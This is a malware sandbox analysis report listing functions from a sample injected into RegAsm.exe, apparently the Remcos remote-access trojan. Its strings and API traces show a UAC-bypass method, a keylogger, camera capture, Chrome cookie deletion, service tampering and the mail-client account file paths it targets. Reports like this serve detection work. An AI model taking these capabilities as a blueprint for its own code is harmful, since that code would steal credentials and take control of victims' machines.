                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                          Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          • CoUninitialize.OLE32 ref: 00407664
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeObjectUninitialize_wcslen
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                          • API String ID: 3851391207-1839356972
                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                          Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                          • GetLastError.KERNEL32 ref: 0040BB22
                                          Strings
                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                          • UserProfile, xrefs: 0040BAE8
                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 2018770650-304995407
                                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                          Function 0040729B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                          Download Yara Rule
                                          Strings
                                          • Rmc-OT0ZCG, xrefs: 00407715
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                          • `.p, xrefs: 004076DF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-OT0ZCG$`.p
                                          • API String ID: 0-1225566033
                                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                          Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                          Download Yara Rule
                                          APIs
                                          • __allrem.LIBCMT ref: 0043ACE9
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                          • __allrem.LIBCMT ref: 0043AD1C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                          • __allrem.LIBCMT ref: 0043AD51
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                          Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleep
                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                          • API String ID: 3469354165-3054508432
                                          • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                          • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                          Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                          • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                          Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _strlen.LIBCMT ref: 10001607
                                          • _strcat.LIBCMT ref: 1000161D
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                          • String ID:
                                          • API String ID: 1922816806-0
                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                          Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$AttributesFilelstrcat
                                          • String ID:
                                          • API String ID: 3594823470-0
                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                          Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID:
                                          • API String ID: 493672254-0
                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                          Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                          Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                          • _free.LIBCMT ref: 004482CC
                                          • _free.LIBCMT ref: 004482F4
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                          • _abort.LIBCMT ref: 00448313
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                          Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                          • _free.LIBCMT ref: 10005B2D
                                          • _free.LIBCMT ref: 10005B55
                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                          • _abort.LIBCMT ref: 10005B74
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                          Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                          Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                          Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                          Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                          • API String ID: 4036392271-1520055953
                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                          Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                          • wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimewsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                          • API String ID: 1497725170-248792730
                                          • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                          • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
